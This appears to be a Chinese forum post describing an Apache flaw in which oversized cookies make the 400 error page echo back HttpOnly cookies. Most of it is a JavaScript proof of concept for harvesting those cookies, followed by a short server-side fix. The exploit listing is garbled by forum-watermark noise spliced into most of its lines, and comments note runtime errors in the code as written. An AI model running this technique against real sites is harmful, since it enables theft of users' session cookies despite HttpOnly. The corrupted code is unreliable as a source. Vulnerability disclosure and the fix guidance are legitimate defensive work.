很多程序以及一些商业或成熟的开源CMS文章系统,为了防止XSS盗取用户cookie,一般都会给cookie加上HttpOnly属性,禁止直接用JS读取用户cookie,从而降低XSS的危害;而本文所述的问题刚好可以用来绕过cookie的这个HttpOnly属性。
用Chrome打开一个站点,按F12打开开发者工具,切换到Console,输入如下代码并回车:
// http://www.exploit-db.com/exploits/18442/
// Sets (good falsy/undefined) or expires (good truthy) ten cookies named
// xss0..xss9. Each "set" cookie carries an 819-byte filler value so that,
// together, they inflate the browser's next Cookie request header; the rest of
// the listing relies on a vulnerable Apache answering such a request with a 400
// page that echoes the rejected header back (HttpOnly cookies included) — the
// server-side leak this page documents, together with its server-side fix.
// Parameter `good`: truthy → expire the xssN cookies (expires set 1 ms in the
// past); falsy/undefined → set them.
// Note: this listing is interleaved with forum watermark noise; the gist linked
// below the listing holds the original text.
function setCookies (good) {% ?; ~) b4 J: ~7 C' J0 F* G
// Construct string for cookie value) |! P& m6 \7 W0 Y3 w
var str = "";
// 819 x's per cookie, ten cookies: the exact header-size threshold this must
// exceed is server-dependent and not stated on this page.
* f% Q3 o" d3 w1 g' kfor (var i=0; i< 819; i++) {
4 g }1 b {, N* }; u- Kstr += "x";
9 Y/ m H) y3 c) B, p}4 h+ L, s* j: R; a) E+ d
// Set cookies
1 u4 C3 S1 }" r* o' R- {; |1 Ufor (i = 0; i < 10; i++) {
5 k5 \* W9 @0 L: t" t// Expire evil cookie
// `expires` one millisecond in the past tells the browser to drop the cookie.
% @, `1 G# o, sif (good) {
" j2 H9 l! H/ E. T2 Y! d8 W1 Xvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";7 w0 ~6 T, |: F8 T, |& m8 h: |4 M
}3 v z( W, ?5 x3 c
// Set evil cookie* v/ L: j6 W7 T
else {. j9 y% ?5 z3 ~3 E. W
// `var cookie` is function-scoped, so the two declarations share one binding.
var cookie = "xss"+i+"="+str+";path=/";
; E0 Q8 i# h3 l9 j1 V! X2 ~" i7 U}- Q/ ]% i0 G* [: c& }- A( h
document.cookie = cookie;
7 b7 i, `- D$ c1 R}
& A2 o/ R$ {# ?: E" q: p) r& r0 _: x}
// Drives the demonstration: plants the filler cookies (setCookies()), issues a
// same-origin GET / through XMLHttpRequest and, on a 400 reply, lets
// parseCookies scrape whatever the error page echoes back.
// Defender's view: the disclosure happens in the server's 400 error page, which
// reflects the rejected request header (HttpOnly cookies included), so the
// browser-side HttpOnly flag cannot prevent it; the fix belongs on the server
// (a custom ErrorDocument 400 text or an upgraded Apache, as the prose below
// explains). Requests carrying multi-KB Cookie headers that draw 400 responses
// would be the observable signature of this technique.
// `xhr` is declared later in this function with `var`, so it is hoisted and
// visible to parseCookies by the time the handler runs.
# z3 Z4 R4 c' k1 G1 ]8 Ffunction makeRequest() {4 S) y8 e' m/ z, ?9 s& H
// Plant the ten oversized xssN cookies before sending the request.
setCookies();( I; n0 {1 p$ u
// readystatechange handler: collects name/value pairs from the echoed header.
// The collected pairs are only shown via alert(); this snippet sends them nowhere.
function parseCookies () {
: F* G2 F R1 L' A; y, Qvar cookie_dict = {};3 U |' K- c, |2 k& ~
// Only react on 400 status! G$ ^7 H: @, ?
// readyState 4 = DONE; any status other than 400 is ignored.
if (xhr.readyState === 4 && xhr.status === 400) {- `) t* C; j& x- ^; Q/ X) _0 u
// Replace newlines and match <pre> content) \+ `! m% k7 r9 E: v- k
// NOTE(review): String.prototype.match returns null when no <pre>…</pre> is
// present, so the `.length` check on the next line would throw a TypeError
// rather than fall through.
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/); f& q/ I0 l. r6 N% C
if (content.length) {
1 |: Y- q, H8 P( Z; t# Q// Remove Cookie: prefix
// Assumes the error page prints the header as "Cookie: name=value; …" — not
// shown on this page; verify against an actual 400 response.
( T |! U' E( x: [content = content[1].replace("Cookie: ", "");
// Drop the filler xssN=xxx… entries, then split the remainder on ';'.
: O8 I" }$ p! d' \5 Q: D; G( Zvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);7 G b: ?( M6 R- L) n
// Add cookies to object6 J/ f* z2 K6 y; `7 J: }
for (var i=0; i<cookies.length; i++) {$ ?; |) t* O" x
// NOTE(review): `cookies` is an array (result of the split above), so calling
// `.split` on it throws a TypeError as written.
var s_c = cookies.split('=',2);
) X9 c# t: B, Ccookie_dict[s_c[0]] = s_c[1];
- ^- `& w: y4 b" h4 i}) K0 b3 E, b" x
}
6 F, t* Z. B# v% I+ C* \// Unset malicious cookies
// Expire the xssN cookies so subsequent requests no longer carry the oversized header.
9 c7 |4 A; m* g' NsetCookies(true);
6 V2 P$ f4 Q; T5 e }1 talert(JSON.stringify(cookie_dict));
; [- e) s3 n6 T& Y# L}
( B& F/ t) X( F w/ v}
( r7 v( N! `5 e" `! P' G// Make XHR request
// Same-origin, asynchronous GET of "/"; the browser attaches the Cookie header
// (now oversized) automatically.
5 R* t6 ~; z/ ?2 p8 ovar xhr = new XMLHttpRequest();
' `2 N0 z) A- n% X1 k; @xhr.onreadystatechange = parseCookies;
3 `- m$ G) R/ H/ A b$ M6 d: ~8 vxhr.open("GET", "/", true);
; t# o- @9 w2 f6 Uxhr.send(null); D: d6 c& U+ f' S% x3 o1 b! P7 L0 a
}7 g5 l1 v* Q9 K( u( |: S
// Entry point: runs the demonstration as soon as the snippet is pasted into the console.
makeRequest();. D% p$ }% y9 v7 @6 |1 x3 g- t
你就能看见华丽丽的400错误页面,里面包含着cookie信息。
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
修复方案:
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message(输出一个简单的硬编码错误信息)
2. output a customized message(输出一段自定义信息)
3. redirect to a local URL-path to handle the problem/error(转向一个本地的自定义页面)
4. redirect to an external URL to handle the problem/error(转向一个外部URL)
经测试,对于400错误只有方法2有效,响应包不会再包含cookie内容。
Apache配置:
ErrorDocument 400 "security test"
当然,将Apache升级到已修复该问题的最新版本也可以:)(见下方参考链接)。
参考:http://httpd.apache.org/security/vulnerabilities_22.html